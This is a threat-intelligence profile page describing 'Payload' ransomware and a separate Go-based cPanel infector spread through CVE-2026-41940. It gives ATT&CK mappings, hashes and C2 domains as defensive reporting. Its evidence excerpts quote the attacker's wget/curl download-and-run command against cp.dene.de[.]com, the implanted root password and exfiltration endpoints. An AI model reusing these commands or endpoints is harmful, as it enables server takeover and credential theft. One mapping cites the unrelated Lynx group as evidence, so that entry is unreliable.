Mallory
Malware | Ransomware | Used by 1 actor | Exploits 1 CVE

Payload

Payload refers to two distinct malware usages in the provided content. Most prominently, Payload is described as an emerging ransomware family active since at least February 2026. It targets Windows and Linux/ESXi systems, appends the .payload extension to encrypted files, and drops a ransom note named RECOVER_payload.txt. Reported capabilities include Curve25519 ECDH and ChaCha20-based per-file encryption, partial encryption of large files, encryption of local and network drives, deletion of shadow copies, clearing of Windows Event Logs, ETW patching in ntdll.dll, termination of backup, database, security, and office-related services and processes, and self-deletion via NTFS alternate data streams. The Windows variant uses the mutex MakeAmericaGreatAgain. The Linux/ESXi variant parses /etc/vmware/hostd/vmInventory.xml to locate VMware disk paths. The ransomware has been associated with leak-site activity and claimed victims across sectors including logistics, transportation, construction, real estate, manufacturing, technology, healthcare, telecom, energy, agriculture, and smaller healthcare providers and clinics.

Reported observables include the SHA-256 hash 1ca67af90400ee6cbbd42175293274a0f5dc05315096cb2e214e4bfe12ffb71f for payload.exe, the SHA-256 hash 29f7f8ccd00ff392dde56ede64b5cae2f0a72dfade096de7a8e4fe1428728c37 for RECOVER_payload.txt, and Tor infrastructure including payloadrz5yw227brtbvdqpnlhq3rdcdekdnn3rgucbcdeawq2v6vuyd[.]onion and payloadynyvabjacbun4uwhmxc7yvdzorycslzmnleguxjn7glahsvqd[.]onion.

Separately, the content also describes a Go-based malware installer named Payload, delivered via exploitation of CVE-2026-41940 against cPanel & WHM. That Payload implants an SSH public key, changes the root password to 123Qwe123C, deploys a PHP webshell at /usr/local/cpanel/cgi-sys/cpanel.py, injects malicious login.js and login.tmpl into the cPanel login path to steal usernames, passwords, User-Agent strings, and URLs, exfiltrates data to wrned.com, cp.dene.de.com/collect.php, and a Telegram group controlled by the attackers, and ultimately deploys a cross-platform remote-control trojan named filemanager. This activity is attributed in the content to a cluster tracked as Mr_Rot13 and is associated with infrastructure including wrned.com, cp.dene.de.com, and wpsock.com, as well as MD5 hashes fb1bc3f935fdeb3555465070ba2db33c for the Update/Payload installer, 9305b4ebbb4d39907cf36b62989a6af3 for a Linux AMD64 filemanager sample, and 2286f126ab4740ccf2595ad1fa0c615c for a related helper.php backdoor. Because the provided content uses the same name for both a ransomware family and a separate Go-based cPanel infector, the naming is ambiguous.


EXPLOITED CVES

Vulnerabilities exploited

1 CVE Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.

1 CVE
CVE-2026-41940: cPanel & WHM Authentication Bypass via Session-File CRLF Injection (Exploited in the wild)

Attackers are exploiting cPanel flaw CVE-2026-41940 to install the Filemanager backdoor and gain unauthorized admin access... CVE-2026-41940 is an authentication bypass flaw affecting cPanel and WHM versions after 11.40. | Researchers also uncovered a new Go-based malware called “Payload,” which installs SSH keys, malicious PHP and JavaScript code, steals credentials, and sends stolen data to attackers through Telegram before deploying a remote-control trojan named Filemanager.

via Security Affairs (securityaffairs.com)
THREAT ACTORS

Groups observed using it

1 distinct threat actor attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.

Mr_Rot13

Researchers also uncovered a new Go-based malware called “Payload,” which installs SSH keys, malicious PHP and JavaScript code, steals credentials, and sends stolen data to attackers through Telegram before deploying a remote-control trojan named Filemanager.

via Security Affairs (securityaffairs.com)
MITRE ATT&CK

Techniques & procedures

28 distinct techniques documented for this family, organized by ATT&CK tactic.

Initial Access

2 techniques
T1078 Valid Accounts (Evidence: 2)

Researchers discovered a new Go-based malware called “Payload,” which installs SSH keys...

T1190 Exploit Public-Facing Application (Evidence: 2)

Attackers are exploiting cPanel flaw CVE-2026-41940 to install the Filemanager backdoor and gain unauthorized admin access.

Execution

2 techniques
T1059.004 Unix Shell (Evidence: 3)

...run it continuously in the background using the nohup command... wget ... || curl ... && chmod 755 "$F" && (nohup "$F" -s >/dev/null 2>&1 &) && sleep 2; rm -f "$F"

T1059.007 JavaScript (Evidence: 1)

Injects JavaScript code; the corresponding handler function is main_injectLoginPage. Downloads login.js and login.tmpl from the remote server cp.dene.de[.]com... login.js then uses downloaded code snippets to steal the username, password, User-Agent, and current URL when the user logs in.

Persistence

5 techniques
T1078 Valid Accounts (Evidence: 2)

Researchers discovered a new Go-based malware called “Payload,” which installs SSH keys...

T1098 Account Manipulation (Evidence: 1)

Modify ROOT password root:123Qwe123C Implant SSH public key ssh-ed25519 ... cpanel-updater

T1098.004 SSH Authorized Keys (Evidence: 2)

Changes the password and implants an SSH public key; the corresponding handler functions are main_changeRootPassword and main_installSSHKey... Implants SSH public key ssh-ed25519 ... cpanel-updater

T1505.003 Web Shell (Evidence: 2)

Written in Go and likely generated with AI assistance, the malware changes root passwords, installs SSH keys, deploys PHP webshells, injects malicious JavaScript into cPanel login pages, steals credentials, and exfiltrates sensitive data.

T1556 Modify Authentication Process (Evidence: 2)

Inject Javascript code... Download login.js and login.tmpl from the remote server... save them to /usr/local/cpanel/base/unprotected/cpanel to create a customized login page.

Privilege Escalation

4 techniques
T1068 Exploitation for Privilege Escalation (Evidence: 1)

CVE-2026-41940 is a high-severity unauthenticated authentication bypass vulnerability affecting cPanel & WHM... an attacker can remotely bypass authentication and take over the cPanel / WHM control panel, allowing an unauthenticated remote attacker to gain administrator privileges on the affected server.

T1078 Valid Accounts (Evidence: 2)

Researchers discovered a new Go-based malware called “Payload,” which installs SSH keys...

T1098 Account Manipulation (Evidence: 1)

Modify ROOT password root:123Qwe123C Implant SSH public key ssh-ed25519 ... cpanel-updater

T1098.004 SSH Authorized Keys (Evidence: 2)

Changes the password and implants an SSH public key; the corresponding handler functions are main_changeRootPassword and main_installSSHKey... Implants SSH public key ssh-ed25519 ... cpanel-updater

Stealth

4 techniques
T1027 Obfuscated Files or Information (Evidence: 1)

The server address uggcf://jearq.pbz/ybt.cuc?g=3 is ROT13-encoded... The file consists of 2 parts... everything after </script>*/ is obfuscated malicious code. The obfuscation is simple string XOR concatenation... after deobfuscation it is str_rot13

T1036 Masquerading (Evidence: 2)

This so-called Update file is the Payload infector mentioned earlier.

T1070 Indicator Removal (Evidence: 1)

The malware downloads and runs a backdoor called Filemanager from attacker-controlled servers, then deletes traces of the installer.

T1078 Valid Accounts (Evidence: 2)

Researchers discovered a new Go-based malware called “Payload,” which installs SSH keys...

Defense Impairment

1 technique
T1556 Modify Authentication Process (Evidence: 2)

Inject Javascript code... Download login.js and login.tmpl from the remote server... save them to /usr/local/cpanel/base/unprotected/cpanel to create a customized login page.

Credential Access

6 techniques
T1056 Input Capture (Evidence: 2)

Written in Go and likely generated with AI assistance, the malware changes root passwords, installs SSH keys, deploys PHP webshells, injects malicious JavaScript into cPanel login pages, steals credentials, and exfiltrates sensitive data.

T1056.003 Web Portal Capture (Evidence: 1)

The login.js ... steal the user's username, password, User-Agent, and current URL during login, and sends this sensitive data via an AJAX request to a remote server controlled by the attackers.

T1056.004 Credential API Hooking (Evidence: 1)

The login.js... uses code snippets to steal the user's username, password, User-Agent, and current URL during login, and sends this sensitive data via an AJAX request to a remote server controlled by the attackers.

T1555 Credentials from Password Stores (Evidence: 2)

Its main functions are: implanting an SSH public key, malicious PHP, and JS code into the compromised cPanel system, stealing login credentials, sending the stolen information back to a Telegram group controlled by the attackers

T1556 Modify Authentication Process (Evidence: 2)

Inject Javascript code... Download login.js and login.tmpl from the remote server... save them to /usr/local/cpanel/base/unprotected/cpanel to create a customized login page.

T1649 Steal or Forge Authentication Certificates (Evidence: 1)

The infector collects sensitive information from the compromised system, including bash history, ssh data...

Discovery

1 technique
T1082 System Information Discovery (Evidence: 1)

The infector collects sensitive information from the compromised system, including bash history, ssh data, device information...

Collection

5 techniques
T1005 Data from Local System (Evidence: 1)

The infector collects sensitive information from the compromised system, including bash history, ssh data, device information, database passwords, Valiases configuration, etc., and sends it back to the hacker's server.

T1056 Input Capture (Evidence: 2)

Written in Go and likely generated with AI assistance, the malware changes root passwords, installs SSH keys, deploys PHP webshells, injects malicious JavaScript into cPanel login pages, steals credentials, and exfiltrates sensitive data.

T1056.003 Web Portal Capture (Evidence: 1)

The login.js ... steal the user's username, password, User-Agent, and current URL during login, and sends this sensitive data via an AJAX request to a remote server controlled by the attackers.

T1056.004 Credential API Hooking (Evidence: 1)

The login.js... uses code snippets to steal the user's username, password, User-Agent, and current URL during login, and sends this sensitive data via an AJAX request to a remote server controlled by the attackers.

T1560 Archive Collected Data (Evidence: 1)

Collects sensitive information from the compromised system, including bash history, ssh data, device information, database passwords, Valiases configuration, etc., and sends it back to the hacker's server.

Command and Control

5 techniques
T1071 Application Layer Protocol (Evidence: 1)

The attackers also used Telegram bots as a backup channel to receive stolen information.

T1071.001 Web Protocols (Evidence: 1)

The C2 responds with a JSON object... reports key parameters... back to the C2 address https://wrned[.]com/api.php?t=3&c=1 ... sends this sensitive data via an AJAX request to a remote server controlled by the attackers.

T1090.003 Multi-hop Proxy (Evidence: 1)

sending the stolen information back to a Telegram group controlled by the attackers

T1105 Ingress Tool Transfer (Evidence: 3)

Its function is to request a malicious payload named Update from the download server cp.dene.de[.]com, and run it continuously in the background using the nohup command... wget -q -O "$F" 'https://cp.dene.de[.]com/Update' ... || curl -sk -o "$F" 'https://cp.dene.de[.]com/Update'

T1219 Remote Access Tools (Evidence: 1)

Deploy Filemanager remote-control tool... Filemanager is a cross-platform backdoor... At runtime, Filemanager listens on the port specified by the port parameter and provides the attacker with a channel for remotely managing the compromised system via a Web page.

Exfiltration

2 techniques
T1041 Exfiltration Over C2 Channel (Evidence: 2)

...sends this sensitive data via an AJAX request to a remote server controlled by the attackers... The reporting endpoint is https://cp.dene.de[.]com/collect.php .

T1567 Exfiltration Over Web Service (Evidence: 2)

...sending the stolen information back to a Telegram group controlled by the attackers... the Payload infector also supports a redundant Telegram exfiltration channel.

Impact

1 technique
T1486 Data Encrypted for Impact (Evidence: 1)

Lynx is a ransomware group operating under a double extortion model, combining encryption with data exfiltration.

INDICATORS OF COMPROMISE

IOCs tracked for this family

16 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.

Network
6 tracked

IPs, domains, and DNS infrastructure linked to this family.

Hashes
7 tracked

File hashes (MD5, SHA-1, SHA-256) from samples and reports.

Other
3 tracked

Other indicator types observed in public reporting.

Type | Value | Latest sighting
hash.md5 | (masked; full value available in Mallory) | 1 month ago
domain | (masked; full value available in Mallory) | 1 month ago
ip.v4 | (masked; full value available in Mallory) | 1 month ago
ip.v4 | (masked; full value available in Mallory) | 1 month ago
domain | (masked; full value available in Mallory) | 1 month ago
hash.md5 | (masked; full value available in Mallory) | 1 month ago
ACTIVITY FEED

Recent activity

7 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.

Cyber Security News (News)
May 26, 2026
Payload Ransomware Uses ChaCha20 and Curve25519 ECDH to Encrypt Windows Files

Payload is a Windows-targeting ransomware family that encrypts files and appends the .payload extension, drops a ransom note named RECOVER_payload.txt, deletes shadow copies, clears event logs, terminates backup/database/office processes and services, and uses Curve25519 ECDH with ChaCha20 for per-file encryption.

Security Affairs (News)
May 12, 2026
Attackers exploit cPanel CVE-2026-41940 to deploy Filemanager Backdoor

A Go-based malware infector used in attacks exploiting cPanel CVE-2026-41940. It implants SSH keys, malicious PHP and JavaScript, changes root passwords, injects webshells and login-page JavaScript, steals credentials, exfiltrates data via Telegram, and deploys the Filemanager trojan for persistent access.

Qianxin XLab Blog (News)
May 11, 2026
Mysterious hacker group Mr_Rot13, covertly active for 6 years, is exploiting a high-severity cPanel vulnerability to deploy backdoor trojans

A Go-based infector/downloader delivered via CVE-2026-41940 against cPanel & WHM. It changes the root password, installs an SSH public key, drops a PHP webshell, injects malicious JavaScript into the login page to steal credentials, exfiltrates host and credential data to attacker infrastructure and Telegram, and deploys the Filemanager RAT.

Qianxin XLab Blog (News)
May 11, 2026
Threat Actor Mr_Rot13 Actively Exploits CVE-2026-41940 for Backdoor Deployment

A Go-based infector delivered via exploitation of CVE-2026-41940. It modifies the root password, installs SSH keys, drops a PHP webshell and malicious JavaScript, steals credentials and system data, exfiltrates data to attacker infrastructure and Telegram, and deploys the Filemanager remote-control trojan.
